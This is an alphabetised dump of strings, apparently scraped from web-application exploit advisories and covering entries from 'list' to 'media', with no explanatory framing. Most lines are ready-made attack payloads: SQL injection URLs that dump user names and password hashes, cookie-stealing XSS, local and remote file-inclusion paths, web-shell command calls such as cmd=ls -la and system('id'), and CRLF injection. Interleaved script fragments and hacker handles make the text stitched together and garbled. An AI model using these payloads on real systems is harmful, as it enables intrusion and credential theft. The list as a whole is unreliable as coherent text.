lista_articulos.php?id_categoria=42+union+select+1,customers_password+from+customers--
list.admin.php
listall.inc.php?mysqlcall=[evil_script]
listall.inc.php?mysqlcall=[file] 
list_all.php?folder=..
lista.php?email='+[SQL]
list.asp?agent=[sqli]
list_blogs.php?sort_mode=!@
listcharges.php?customerPlanID=[SQL]
listcomment
listcomment.class.php?system_path=[evil_scripts]
liste9.html
listen.php?src=..
listen.php?src=[Local File]%00
ListEvents.php
list_files
list_galleries.php?sort_mode=[SQL]
list.gtdat
list.gtdat)
&listid=20&users=demo,demo1,demo2
list?id_menu=9
listing
listing;
listing.class.php?system_path=[evil_scripts]
listing.datatype.php?system_path=[evil_scripts]
listing.php?id=[query]
listings
listings.php
listings.php?id=-1+union+select+1,2,3,concat(user,0x3a,pass),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25+from+users
listings.php?link_idd=-13+UNION%20SELECT%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,
listings.php?link_idd=-13+UNION%20SELECT%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,
listings.php?next=1%3Cscript%3Ealert(0)%3C
listing_video.php?catid=2+UNION%20SELECT%201,2,3,4,CHAR(83,%20110,%2097,%20107,%20101,%20115,%2084,%20101,%2097,%2077),6,7,8,9,10,11,concat(@@version,0x3a,user(),0x3a,database()),13,14,15,16,17,18--
listing_view_combidialog.php?system_path=[evil_scripts]
listing_view.php?itemnr=null+union+all+select+1,2,3,concat(email,0x3a,0x3a,0x3a,password),5,6,7,8,9,10+from+users--
listing-your-section.html
list.jsp
listlatestdoc
listlatestdoc.class.php?system_path=[evil_scripts]
list_list.php?id=-1+UNION%20SELECT%20username,2+from+roundcube.users--
list_list.php?id=-1+UNION%20SELECT+password,2+from+mysql.user--
listmembers.php?show=all&rank=%2527 UNION SELECT 	#
list_message
listmessenger.php?lm_path=evil_script?
 list\n";
list.php?bbs_code=notice'+and+1=2+union+select+1%2C2%2C3%2C4%2C1%2C6%2C7%2C8%2C9%2C10%2C11%2C12%2C13%2C14%2C15%2C16%2C17%2C18%2C19%2C20%2C21%2C22%2C23%2C24%2C25%2C26%2C27%2Cdatabase()%2C(select%20concat(0x2f,unhex(Hex(cast(user()%20as%20char)))))%2C30%2C31%2C32%2C33%2C34%2C35%2C6%2C5%2C4%2C3%2C2%23
list.php?bbs_code=notice[SQL]
list.php?browse=subject&parent_id=1 UNION SELECT 1,concat_ws(0x3a,version(),database(),user())
list.php?c=%27&s=title&w=asc&o=1&p=1 
list.php?c=articles&s=title&w=asc&o='&p=1
list.php?c=articles&s=title&w='&o=1&p=1
list.php?c=articles&s='&w=asc&o=1&p=1 
list.php?c='&s=' 
list.php?c='><script>alert(document.cookie);<
list.php?c='&s=title&w=asc&o=1&p=1
list.php?delete=1&gId=-1 AND 1=IF(2>1,BENCHMARK(5000000,MD5(CHAR(115,113,108,109,97,112))),0)
list.php?f=DESIRED_PHP_FILE_WITHOUT_EXTENSION 
list.php?id=161'    (SQL ?nj.)
list.php?keywords=&users=&category=&release=%22%3E%3Ciframe%3E
list.php?lang=..
list.php?lang=1&path=42&num=13&action=n&sort=Id&page=0'
list.php?lang=1&path=50&num=38&action=n&sort=Id&page=0[sql]
list.php?lcat_id=-1+union+select+concat(admin_name,0x3a,admin_pass,0x3a,admin_mail)+from+admin
list.php?lcat_id=[N.A.S.T ]
list.php?list_id=2'
list.php?list_id=-2 union all select 1,2,group_concat(user_id,0x3a,login,0x3a,password) FROM users--
list.php?mode=plugin&id=699
list.php?pagenum=0&categoryid=-1%20UNION%20SELECT%200,login,0,0%20FROM%20users%20
list.php?pagenum=0&categoryid=-1%20UNION%20SELECT%200,password,0,0%20FROM%20users%20
list.php?page=<script>alert("MajorSecurity")<
List.php?strTable=<script>alert(document.cookie)<
listpopulardoc
listpopulardoc.class.php?system_path=[evil_scripts]
listrearrange
listRepositories
lists
lists.horde.org
lists.php?active_role=[sql-injection]
list.sub.html.php?mosConfig_absolute_path=[evilcode]
listtest.php?r=-20+union+select+1,concat_ws(0x3a,user(),version(),database())--
listtest.php?r=-39+union+select+1,@@version--
listtest.php?r="><script>alert()<
listtest.php?r="><script>alert(document.cookie)<
list_unapproved.php?gfplugins=[Shell]
listuser.php"
list_user.php?userID=-9999
list_user.php?userID=[SQL Injection]
list.user.sub.html.php?mosConfig_absolute_path=[evilcode]
lit
litbang
lite
litenew
LiteNews-Download-43228.html#download_locations
literadius
litespeed-web-server-downloads.html
lito_lite 10\n";
littlecms
livealbum
livechat.html
live_checkbox.php3?GLOBALS[AA_INC_PATH]=[evil_scripts]
live-demo.html
livedraft
livedraft.php?PHPFFL_FILE_ROOT=[ Evil Code ]
livehelp
[livehelperpath]
livesig
livesig-ajax-backend.php POST="wp-root=RFI&action=asdf"
'.$livesite.$livepath;
livesites
live-space.ru
live_support.php                                                         ¦       ¦                                       ¦
liveuser_configuration.php?GLOBALS[g_campsiteDir]=[SHELL]
livezilla
LivingLocal
livinglocal.php
liz0.li.funpic.org
Liz0ziM
liz0zim.no-ip.org
liza
lizardcart
lizardwarecms
lJ5iQ
ll
lmo
lmscampus.tld
lms_path
lnblog
[lnblog-0.9.0]
LNE
/?lng=es"><script>alert(document.cookie)<
/?lng=<script> 
lnkx
loaclhost
load
loader.php?js=
loader.php?js=..
load.inc.php
load_lang.php?_SERWEB[serwebdir]=[Evil_Script]
load_language.php
load_language.php?page_language=[LFI]
load_language.php?userlanguage=
loadmsg.php?lang=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fboot.ini%00
load_page.php?uid=7
load_page.php?uid=9
loadpanel.php?Panel=[LFI]%00
load.php?id=1595
load.php?id=8003
load.php?mod=pages&page="><script>alert(
load.php?mod=pages&page="><script>alert(document.cookie)<
load_wp_config.php
loady
locahost
local
[Local
localclassifieds
local-classifieds.html ]
localconf.php
localconf.php)'
locale
[local-file]
[localfile]
Local file
[ Local File ]
[Local File]
[local_file]%00
[local-file]%00
[local-file]%00 
[localfile]%00
[Local File]%00
[Local File]%00&page_id=106
[LOCAL FILE INCLUDE VULNERABILITY!]
[LOCAL FILE INCLUDE VULNERABILITY!]&..
local-file-inclusion
local_file_inclusion_in_podcast_generator.html
local_file_inclusion_in_reos.html
localh0st
localhost
[localhost]
{localhost}
localhost 
localhost");
localhost"){
localHost
 Localhost 
localhost 1 1\n";
localhost:1881
localhost 1\n";
localhost:2082
localhost:3455
localhost:6450
localhost:80
localhost:8000
localhost:8080
localhost:8080"
localhost:88
localhost:888
localhost -c user=MjphZG1pbjo1ZjRkY2MzYjVhYTc2NWQ2MWQ4MzI3ZGViODgyY2Y5OToxMDo6MDowOjA6MDo6NDA5Ng==\n");
localhost.free
localhost.il
localhost.localdomain
localhost 'ls -a'\n";
localhost\n";
localhost\n");
localhost\r\n'
localhost\r\n";
localhost shell.php\n\n";
localhost", url );
localhost webs_\n";
localhost with the website link.
localhost x128 pwd 1\n";
localhsot
localizedimage.php [name of an arbitrarily supplied request parameter]
localroot
localsite
location
[location]
Location
/?location=%26%23039;
locationdetails.php?did=[CROSS SITE SCRIPTING]
Location: login_page.php
Locator
locator.php?action=get_user&x=233&y=365'
locator.php?action=get_user&y='");
locator.php?parsed_page=1&lat=25.4405436315&long=132.710253334'
locator.php?parsed_page=1&lat=25.4405436315&long=132.710253334 and ascii(substring((SELECT concat(username,0x3a,password,0x3a,0x0a) FROM USERS limit 0,1),1,1))>80
LockResolve.php?GLOBALS[sugarEntry]=1&_SESSION[o_lock_object]=1&_SESSION[o_lock_module]=1&beanList[1]=1&beanFiles[1]=..
loclahost
locms
$LOC?SEQ=$SEQ&OUT=$OUT&IN=$SIP%0d%0aApplication:%20System%0d%0aData:%20cd%20
$LOC?SEQ=$SEQ&OUT=$OUT&IN=$SIP%0d%0aApplication:%20System%0d%0aData:%20cd%20cd%20
$LOC?SEQ=$SEQ&OUT=$OUT&IN=$SIP%0d%0aApplication:%20System%0d%0aData:%20echo%20\!
$LOC?SEQ=$SEQ&OUT=$OUT&IN=$SIP%0d%0aApplication:%20System%0d%0aData:%20echo%20%2dn%20prdownloads.sf.net
$LOC?SEQ=$SEQ&OUT=$OUT&IN=$SIP%0d%0aApplication:%20System%0d%0aData:%20mv%20
log
log1cms.sourceforge.net
logahead
logfile.csv
logger.cgi?'
[logger_path]
logger.php?cookie=" + document.cookie;<
logger.php?var="+document.cookie<
logging.php
loggix.gotdns.org
log.gtdat%00
logic
login
*  - login      #											  
login                                                     #
login',
login"
* - LOGIN AND PASS (MD5)
login.asp
login.aspx
login.aspx            #
login.aspx  #
login?BackURL=[URL]
logincheck.inc.php?path=[evil_scripts]
login_check.php?hauptverzeichniss=[shell]
login.class.php?system_path=[evil_scripts]
logindata.conf%00
login.ei
login_end.php" alt="Do you see this?" 
loginform.php
login.htm
login.html
login.html 
login HTTP
login.inc.php?install_root=[Shell]
login.inc.php?mysqlCall=[evil_script]
login.inc.php?mysqlCall=[file] 
login_index.php
login', login_data)
LoginManager.php?path=<File Inclusion>%00
Login name)
LoginName='admin
LoginPage.class.php?base_path=[evil_scripts]
[LOGIN PAGE].php?[ACCESS DENIED VARIABLE]
login;partyId=aa"
login.php
login.php 
login.php?
login.php';
login.php');
login.php)
login.php						#
login.php (2 Login)
login.php3
login.php3err=hack&BSX_HTXDIR=<br>"
login.php?action=backup
login.php?action=backupnow
login.php?action=download&file=db_comm-20100301222138.sql
login.php?action=download&file=db_ebookstore-20100301222138.sql
login.php?action=download&filename=
login.php?action=form&url=download.php
login.php?action=insert_category&cPath=" method="post" enctype="multipart
login.php?action=insert" method="post" enctype="multipart
login.php?action=login&username="><iframe>
login.php?action=processuploads" method="post" enctype="multipart
login.php?action=Register
login.php?action=save" method="post">
login.php?action=save" method="post"> 
login.php?action=upload (2 upload ev!l "not finishid")
login.php?aID=1">    <
login.php?aID=1&action=save" method="post"> Change Admin Pass
login.php and use this:
login.php?arsc_message=%3Cscript%3Ealert%28document.cookie%29%3C
login.php?btag=<script>alert(document.cookie)<
login.php?c=4806666
login.php?c=4871187
login.php?caller=xlink&url=detail.php&itemID=1[SQL]
login.php?&changelanguage=yes&NEWLANGUAGE=<iframe>
login.php?check=1&admin=1 
login.php?cid=' 
login.php?cmd=ls%20-la
login.php?code=i\r\n";
login.php?customerEmailAddress=%22%3E%3Cscript%3Ealert(document.cookie)%3C
login.php -d "action=insert" -d "username=test" -d "password=test" 
login.php?default_language=..
login.php?dest=%22%3E%3Cscript%3Ealert(document.cookie)%3C
login.php?do=
login.php?do=backup (CReat And Download Backup)
login.php?email="><script>alert(document.cookie)<
login.php?error_code=upgrade&f_user_name=%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C
login.php?error=<h1><marquee>Test
login.php?error=<script>alert(document.cookie)<
login.php?error=<script>(document.cookie)<
login.php?Fake=<fake><script>alert(
login.php'.format(options.ip, options.rootp), data)
login.php?form_lang=..
login.php << from demo site :)
Login.php?GLOBALS[sugarEntry]=1&theme=..
login.php?go_info[server][classes_root]=[cmd_url]
login.php HTTP
login.php?includedir=[evilscript] |
login.php?include_path= [Shell]
login.php?in_login=yes&retpage=%2Fadmin%2Findex.php
login.php?installed=101&no_user_rights=101&login_first_echo=101&already_logged_in=101&login_user_deactivated=101&login_failed=101&login_success=101&nosaltnpepper=101&user=101<script>alert(2)<
login.php?lang=
login.php?lang=..
login.php?lang_code=1'+and+sleep(5)%23 (get)
login.php?lang=fr-en
login.php?language=[LocalFile]
login.php?login=1&password=1 and fill the forms with '1' value
login.php?login=1&password=1', data[0])
login.php?login='%20OR%20ISNULL(NULL)%20INTO%20OUTFILE%20'
login.php?login=%22%3E%3Ciframe%3E 
login.php?login=fail&reason=<script>alert(document.cookie);<
login.php?login_ok=1
login.php?logout
login.php?makehtml=1&chdb[htmlname]=seek.php&chdb[path]=cache&content=<?php%20@eval($_POST[s]);?>
login.php' method="post">
login.php" method="POST">
login.php?option=chat&username=[code]
login.php?pachtofile=[[Sh3LL Script]]                       #
login.php?password='additional%20sql%20command 
login.php?path_to_root=[[Sh3LLScript]]
login.php?PHPSESSID=BugReportIRSessionFixation
login.php (post)
login.php) redirect the none-authentication users
login.php?ref=%27%3E%3Cscript%3Ealert(document.cookie)%3C
login.php?req=";><iframe src
login.php?return_path=%0d%0aContent-Length:0%0d%0a%0d%0aHTTP
login.php?returnto=data:text
login.php?rid=-1'%20UNION%20ALL%20SELECT%20uid,pass,null,null,null%20from%20user%20WHERE%20uid=1
login.php\r\n";
login.php\r\n".
login.php?session="><script>alert(document.cookie);<
login.phpsess=your_session_id&abt=&new_lang=99999&caller=navlang
Login.php?theme=
login.php&update=update
login.php?url=
login.php?user=-999') and ascii(substring((select user_login from user limit 1,1),1,1))=[ascii code try]
login.php?user=-999') and ascii(substring((select user_pass from user limit 1,1),1,1))=[ascii code try]
login.php?user='additional%20sqlcommand
login.php?UserID='<br><script>alert(document.cookie);<
login.php?username=heh
login.php username:'or' password:'or'
login.php?w=user&o=login&e=u
login.php?w=user&o=login&phpcoinsessid=SQL_INJECTION'
login" % rhost)
login_screen.php?vds_ip=[VDS
login.tpl.php?TplSuffix=[lfi]
login_up.php3?login_name="><script>alert(document.cookie)<
login?user=**<script>JavaScript:alert(document.cookie);<
logo
logoff.html" alt="Do you see this?" 
logo.gif )
logo.gif[
logo.gif [template parameter]
logo.jpg",
logo.jpg" width="429" height="97"><br><br>
logon.php" %rhost, post_params)
logo_.php
logo.php
logo.php.gif
logo.png" width="800px"
logos
logo_sm.gif>
logout">
logout"  alt="Do you see this?" 
logout" alt="Do you see this?" 
logout.html?id=[relative path]
logout.html?id=[relative path]%00blabla 
logout.inc.php?mysqlCall=[evil_script]
logout.inc.php?mysqlCall=[file]
logout.php
logout.php">
logout.php" alt="Do you see this?" 
logout.php?GLOBALS[g_campsiteDir]=[SHELL]
logout.php?path_to_smf=[Shell]
LogPage.class.php?base_path=[evil_scripts]
log.php
log.php?cookie="+encodeURI(document.cookie)<
log.php?logfile=info.php&logtime=000000
log.php?repname=Zend+Framework&path=%2F
log.php works) along with a writable log file called log.
logs
Logs&markspam=-1' OR SLEEP(5)--%20
LogView.Admin.class.php?_CONF[path]=[Evil_Script]
logview.php?ops_file=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows%2fwin.ini
log_view.php?order_by={SQLi
loki
lokicms
[lokiCMS]
lokomedia-1.5.rar
LOL
lolcathost
lol.php-1293423431.jpg?cmd=id 
/?lol=phpinfo();
/?lol=system("id");
london
longDesc.php?h_id=-1%20union%20select%20concat%28username,0x3a,password%29%20from%20jos_users--&id=2
longDesc.php?h_id=1&id=-2%20union%20select%20concat%28username,0x3a,password%29%20from%20jos_users--
longDesc.php?hid=5&rid=-32%20union%20select%20concat%28username,0x3a,password%29%20from%20jos_users--
lookup.php?form=a%28%29;}alert%280%29;{
lo.php
lo.php.gif
lo.php.ttf
lostpassword
lostpassword.php?action=lost&email=fake' or 1=1--' 
lostpassword.php HTTP
lotfree
LOTF-SoftBB.py
loudblog
louportail.free.fr
lovecms
[lovecms]
lovecms_1.6.2_final
lovecms.org
[loveCMS-path]
lowgraphic
low.php?topic="><script>document.location=		#
low.php?topic=' UNION SELECT 0,0,0,CONCAT(CHAR(58),	#
lowsec.org )
lppm.uns.ac.id
lpro.php?id=-1%20UNION%20SELECT%201,concat(username,0x3a,password),3,4,5,6,7,8,9,10,11%20from%20users
lpro.php?id=-1 UNION SELECT 1,concat(username,0x3a,password),3,4,5,6,7,8,9,10,11 from users
lp_user_tb
lr.php
ls
&l=select%20*%20from%20orders
&l=select%20*%20from%20users
 \"ls -la\"\n";
 ls -la\n";
 ls -la -P1.1.1.1:80\r\n\r\n";
 ls -la -p81\r\n";
ls -lR || 
ls.php?lang=en&action=list&start=0&CAT_ID=3&keyword=&search_area=&search_type=&infield=&search_order=[SQL]
ls.php?lang=en&action=list&start=0&CAT_ID=3&keyword=&search_area=&search_type=[SQL]
ls.php?lang=en&action=list&start=0&CAT_ID=3&keyword=&search_area=[SQL] 
ls.php?lang=en&action=list&start=0&CAT_ID=3&keyword=[SQL]
ls.php?lang=en&action=list&start=[SQL]
lti
[lucidcms_dir]
lulieblog
lumet
luo_form.php?CLASSPATH=[AvriLhea]                
luo_save.php?CLASSPATH=[AvriLhea]                
lurm
lustig-cms
luxbum
luxbumrootdir
luxbumrootdir\n";
luxcal
luxcal270
Luxusmailer5
lyftenbloggie
lyrics_menu
lyrics.php?section=full&id=99999999+union+select+1,name,3,pass,5+from+admin--
lyrics.php?section=full&id=[SQL]
Lyrics_Script.html
lyrics_song.php?l_id=-1+union+select+1,2,3,concat(user(),0x3a,database()),5,6,7,8,9,10,11,12,13,14,15,16,17--
lyrics_song.php?l_id=-1+union+select+1,concat(user_name,0x3a,user_password),3,4,5,6,7,8,9,10,11,12,13,14,15++from+e107_user--
lyrics_song.php?l_id=[SQL1] or [SQL2]
lyrics.sourceforge.net
m
/?m=%3Ctitle%3EDEVIL%20TEAM%20HACK%20YOU%3C
-m4st3r--m108099.html> and every muslim hacker
ma3karouna
mac-dock-gallery
macgurublog_menu
macgurublog.php            # 
macgurublog.php?uid=1 and 1>3
macgurublog.php?uid=1 and 2>1
macgurublog.php?uid=1 and substring(@@version,1,1)=4
macgurublog.php?uid=1 and substring(@@version,1,1)=5
macgurublog.php?uid=-1+union+select+concat(user_name,char(58),user_password,char(58)),2+from+e107_user
macgurublog.php?uid=5      #
macgurublog.php?uid=[SQL]
machform
machform.rar
machine.php?ID=1
machine.php?systemid=1)%20union%20select%201,2,user(),3,5,6,7,8,9,10,11,12,passwd,14,15,16,17,18,id,20,21,22,23,24,25,26,27,27,version()%20from%20operators%20--
machine_type
macros
macros_detail.dot?id=..
macs-framework
macs-framework.sourceforge.net
madirishwebmail
madirish_webmail
Madirish_Webmail
Madirish_Webmail.tgz
[Mafia Moblog]
mag
magazine.functions.php?config=[SHeLL]
magelangcyber.web.id
magelangcyber.web.id 
magelangcyber.web.id	       ##
magelangcyber.web.id	   ##
magic-news-pro
magic-photo-storage-website.html
magic_quotes).
magic_quotes_gpc<\
magiya-sluchajnyx-chisel-chast-2
magpierss
magpierss-0.71
magpie_slashbox.php?rss_url=<script>alert(document.cookie)<
mag-zone-online-library-system.html
maian_gallery
maian_uploader
maian-uploader
mail
mail]
MailAdmin.Action.class.php?_CONF[path]=[Evil_Script]
mailbar.php?olang=..
mailbox
mailbox.php?mailbox=$MBOX&sitename=nospamfor.us");
mail "cat 
mail.d4rkn3t.cn
mailer
mailerd4
mailertest
MailForm
/?mail#Inbox.Search
mailinglist
MailingList.class.php?gfcommon=[Shell]
MailingListFactory.class.php?gfcommon=[Shell]
Mailing-List-Managers
mailing.php?idfestival=7 (SQL)
maillist
mailmachine_pro_224.html
mailmachine.shtml
mailman.php3?GLOBALS[AA_INC_PATH]=[evil_scripts]
mailme.php"; #Replace this value by the Url of the Php email script
MailMerge
mailPage.asp?iId=HILHG" method="post">
MailParser.class.php?gfcommon=[Shell]
mail.php
mail.php3?GLOBALS[AA_INC_PATH]=[evil_scripts]
mail.php?action=veiw&mail_id=-1 union select 1,2,3,concat(username,0x3a,password),5,6,7 from admin
mail.php? cmd=remove&email=111' or 1
mail.php?CONFIG[main_path]=[evil_scripts]
mail.php?id='
mail.php?ID=-1+union+select+1,@@version--
mail.php?id='+union+select+1,2,3
mail.php?mailid=$MAILID&sitename=nospamfor.us&mailbox=$MBOX");
mail.php?olang=..
mail.php?referer=<SCRIPT CODE>
mail.pokleyzz.my
mailscanner
mail_send.php
mail.tdah.us
mail&user=..
mailwatch
[mailwatch-1.0.4]
mailz
main
Main
main.asp?UserID=2&page=%22%3E%3Cscript%3Ealert(document.cookie)%3C
main_baseimage.asp
main_class.php?default_path=[evil_scripts]
main_content.php?bm_content=[shell]
maincore.php?folder_level=LFI
maincourante.class.php?path_om[Shell]
main.c?r1=289214&r2=289990&view=patch (NOTE: upstream changed 100 to 20, do it so)
main-display-file.php?file= [anarchything] .jpg<BR>
 main error message --><
mainfile.php 
mainfile.php?MAIN_PATH=[attacker's site]
main_forum.php?cat=-1+Union+ALL+Select+1,group_concat(aId,0x3a,aUsername,0x3a,apassword),3,4,5,6,7+FROM+admins--
main_forum.php?cat=-1+Union+ALL+Select+1,group_concat(userid,0x3a,Username,0x3a,password),3,4,5,6,7+FROM+users--
main_forum.php?cat=[N.A.S.T ]
mainhack.net ]
mainhack.net ]                  #
mainhack.net ]      #
mainheader.inc.php?path=[evil_scripts]
mainincludes
main.inc.php?bank_data[root]=Shellz?
main.inc.php?cmsdir=shell?
main.inc.php?mj_config[src_path]=[spread???]
main.inc.php?NWCONF_SYSTEM[server_path]=)<br>"
main" method="post">
mainpage.php?id=-6 union select 1,adminpassword,3,4,5,6,7,8,9,10,11,12 from tbladmins--
mainpage.php?id={SQLi}
main.php
main.php">
main.php?aa33user=admin
main.php?action=detail&id=..
main.php?action=download&id=..
main.php?action=upload
main.php (By Pass)
main.php?cat_id=1' AND 1337=1337 AND 'takeshix'='takeshix true
main.php?cat_id=1' AND 1337=1337 AND 'takeshix'='takeshixx false
main.php?cat_id=[sql]	|
main.php?cmd=..
main.php?cmd=album&var1=..
main.php?cmd=image&var1=..
main.php?cmd=image&var1=[LFD]
main.php?cmd=phpinfo
main.php?cmd=setquality&var1=[PHP Code Injection]
main.php?cmd=themeimage&var1=[LFD]
main.php?command=view_product&id=-18 UNION SELECT 0,concat_ws(0x7c,username,password,email),2,3,4,5,6,7,8,9,10,11,12,13 from clickbank_admin--
main.php?command=view_product&id=-1 UNION SELECT 0,concat_ws(0x7c,username,password,email),2,3,4,5,6,7,8,9,10,11,12,13 from clickbank_admin--
main.php?content=download&do=file&dlid=113
main.php?content=download&do=file&dlid=179
main.php?content=download&do=file&dlid=21
main.php?content=download&do=file&dlid=243
main.php?do=ava   
main.php?do=news&act=delete&id=1">
main.php?do=newsletter&act=delete&id=1">
main.php?do=user&act=delete&id=2">
main.php?g2_itemId=
main.php?GLOBALS[PT_Config][dir][data]=[evilcode]
main.php?id=1111&show=rubrik&rid=-1%20union%20select%201,2,3,4,version(),6,7,8,9,10,11,12
main.php?keyword=hack&cmd=phpinfo
main.php?lang=tc&page=1&theme=..
main.php?main_dir=[SHELL]
main.php?menuAction=htmlTickets.show;system(id);ob_start 
main.php" method="POST">
main.php?module=..
main.php?module=session&function=..
_main.php?mosConfig_absolute_path=[evilcode]
main.php?mosConfig_absolute_path=[evilcode]
main.php?mydirpath=DSecRG
main.php?p=201&host_id=-1%20[SQL Injection]&o=p&min=1
main.php?p=201&host_id=-1 UNION SELECT 1,@@version,3,4,5&o=p&min=1
main.php?p=201&host_id=-1 UNION SELECT 1,@@version,3,4,5&o=p&min=1';
main.php?page=ftp:
main.php?pageURL=[Evil_Code]
main.php?pg=..
main.php\r\n".
main.php?set[language]=
main.php?sid=..
main.php?sid=426+and+1=1
main.php?sid=426+and+1=2
main.php?website=[SHELL]
maint
maint_contact_view.tpl.php?template_path_core=[SHELL]
MA_ITD
maj
makale
makale.php?id=10+UNION+SELECT+0,1,2,3,database(),5,user(),7,8,9,10,11,12,13,14,15,16,17,18,19--
makale.php?id=-1+union+select+0,1,version(),3,4,5,6,7
make_image.php
make_or_break
makepoll.php" method="post">
makepoll.php?poll[id]=><script>alert(123);<
makepoll.php?returnto=><script>alert(0)<
makepoll.php?returnto=><script>alert(123);<
makepost.php?prefixdir=..
maker.ir
makthepla.net
malcon.org
[malicious code]
malicious-code.php? 
malicious.js" ><
malicious.php 
[malicious_site]
maliciuos_uploaded_code
malingsial.serverisdown.org
mall
malladmin
malloc.im
mambo
[mambo]
mambo): ";
mambo.4.0.x
mambo_46rc1_sql.html
[mambo4.6_x]_sql_injection
mambo-code.org
mambo-developer.org
mambo-foundation.org
mamboleto.php?mosConfig_absolute_path=[INDONESIANCODER-666]
[mambo_path]
[Mambo_path]
MAMBO_path
MambWeather
[mam_jom_path]
manage
manage-admin.php" method="post" name="adminForm">
manageajax.php?action=newcal&y=<script>alert(
manage_banners.php
manage_categories.php
manageforum.php?forum=6&&step=6&delt=12
manageforum.php?forum=[forumid]&&step=[forumid]&delt=[topicid]
managegroup.php?gid=8'
managegroup.php?gid=8&action=do_joinrequests&request[sql]=accept
managegroup.php?gid=8'sql
managegroup.php?gid=8sql&action=do_manageusers
managegroup.php?gid=8'sql&action=joinrequests
management
manage_page.php?action=sql" target="hidden">
managePerson.php?personId=-1+UNION+ALL+SELECT+1,concat(username,0x3A3A3A,password),user(),database(),version(),user(),database(),version(),user(),database(),11,12+FROM+users+WHERE+userId=2252%23
managePerson.php?personId=-1+UNION+ALL+SELECT+1,version(),user(),database(),version(),user(),database(),version(),user(),database(),11,12%23
manage.php
manage.php?stamp=cP
managepoll.php
manager
manager.conf
manager_content.php?page=config_edit_user&user=admin
manager_content.php?page=config_edit_user&user=admin">admin<
manager_content.php?page=config_users
manager.php
manager.php?lng=cmd.php
manager.php?lng=it&id=indirizzo_0
manage_site_files.php
manage_user_create.php?username=foo&realn
manageUser.php
manageuser.php?{2}'.format(
manage_users.php?action=update
manage_users.php?a=edit&id=1">
manage_users.php"><input type="hidden" name="action" value="Save" 
mangobery
mangobery.beryllium.ca
mangobery.sourceforge.net
manhali
manpage
mansjonasson.se
mantis
mantisbt
mantis-init.php?gfplugins?gfplugins=[Shell]
mantis.phplist.com
[MANTIS_ROOT_HOST]
manual
manual-install.php
manual.php
manuals
manuals.php?manual=-9999+union+all+select+user_email,2+from+fusion_users--&page=1
manuals.php?manual=-9999+union+all+select+user_name,2+from+fusion_users--&page=1
manuals.php?manual=-9999+union+all+select+user_password,2+from+fusion_users--&page=1
manuals.php?manual=[ exploit ]
manufacturing
mapage.php?chemin=Evil Code #
map_data.php?action=listpoints&lastMarkerID=0{sql}
map-details.php?lat=-1 UNION ALL SELECT @@version,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--%20&lon=-1&blocked=-1
mapFiler.php
mappa.php?id_att='2121
mappa.php?id_att=[SQLI]
map.php?cmd=\\192.168.1.25\test.php
map.php?cmd=..\..\..\..\test.php
map.php?lat=%3C
maps
Mar
mar2010
maranforum.php                                        +
maranshop.php
marcioforum
marcusbestlamer.gay
mariecms
mariotrey
mariovs.pl
markdown.php?ccms_library_path=[Evil_Code]
marker_listings.xml?id=1%20union%20all%20select%201,2,3,4,5,6,7,8,group_concat(user_login,char(58),user_pass,char(58),user_email),10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31 from wp_users--
marker_listings.xml?id=[SQL]
market.php?do=cat&id=-1+union+select+1,2,3,4,5,6,@@version,8,9,10,11,12,13--
market.php?do=cat&id=[SQL]
marketplacescript.net
markstory
marquee>
marquee%3E
marquee%3E%3C
>"><marquee><font%20color=gren%20size=30>EL-KAHINA My Sister<
masa2el_admin--
mash_profiles.add-edit.php
mash_profiles.list.php
mash_steps.add-edit.php
MassDelete.Admin.class.php?_CONF[path]=[Evil_Script]
MassDelTrackback.Admin.class.php?_CONF[path]=[Evil_Script]
master
master-boy.cwsurf.de
master.inc.php?fm_data[root]=Shellz?
_masterlayout.php?top=
_masterlayout.php?top=[EVIL_CODE]
master.php?newsnr=-999+UNION+SELECT+0,0,0,password,username,username,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0%20FROM+simpnews_users+WHERE+usernr=1--
master.php?newsnr=[sql]
masthead.inc.php?template_path=[LFI]
mat
*")), $match);
matchdb.php?match=
matchdb.php?match=9999999+and+1=0+union+
matchdetail.php?edit=-1 UNION SELECT 0,0,0,pwd,0,0,0,0,0,username,0,0,0,0 FROM pfuser WHERE id=1
matchmaking
matchmaking_software_demo.html
matchmaking_software_demo.html 
mathjax-latex
maticmarket
matrimonial_script.html
matrix.bmp+onload=alert(213771818860)>
matrix.jpg+onload=alert(213771818860)>
matrix.jpg+onload=alert(213771818860)>&cwd=%2E%2Fimage
matteolucarelli.net
mattrogowski.co.uk
mavideo
max
maxdev
MaxForum
maxImageUpload
maximus-cms-fckeditor-arbitrary-file.html |
maxPhotoAlbum
maxsite
maxtradedemo
may2010
) maybe :)
mblogger
mbox-action.php3?BSX_LIBDIR=<br>"
mbox-list.php3?BSX_LIBDIR=<br>"
mbrooks
mbytesecurity.
mbytesecurity.org
mcart.asp
mc-crew.net
mcf.php?content=xpl
mcgallery
mcgp
mCMS
MCshoutbox_Download_Page.html
md5.php?h=$1" || 0;
md5($src);
[md5([user_id][db_pass])].php?cmd=ls%20-la
[md5(user_id)].php?cmd=ls%20-la
[md5([username][db_pass])].php?cmd=ls%20-la
[md5(username)].php?cmd=ls%20-la
md-config.php 
mdigg.html
MDL-41623
mdl_save.php?CLASSPATH=[AvriLhea]
/?m=downloads&cid=
/?m=downloads&cid=1+and+1=0+union+select
mdp.php (containing the md5-crypted
[mdpro_path]
[MDPro_path]
mdweb
MDX
meaning.php?Action=1&ShowByQuranID=1&QuranID=[SQL]
meaning.php?Action=1&ShowByQuranID=[SQL]
meaning.php?Action=[SQL]
mebiblio
mebiblio.sourceforge.net
medecin.class.php?path_om=[Shell]
media
_media
Media
media4.obspm.fr
mediaAdmin.php?d=..
mediaAdmin.php?d=darius.php+$[NEW PATH]%00
mediaAdmin.php?id=%22%3E%3Ciframe%20src=a%20onload=alert%28%22VL%22%29%20%3C
media.divs.js.php?mosConfig_absolute_path=[shell] "
media.divs.php?mosConfig_absolute_path=[shell] "
mediagallery
mediaHolder.php?id=-9999
mediaHolder.php?id=[exploit]
media.inc.php?action=upload';
media.inc.php?lang_path=[cmd_url]
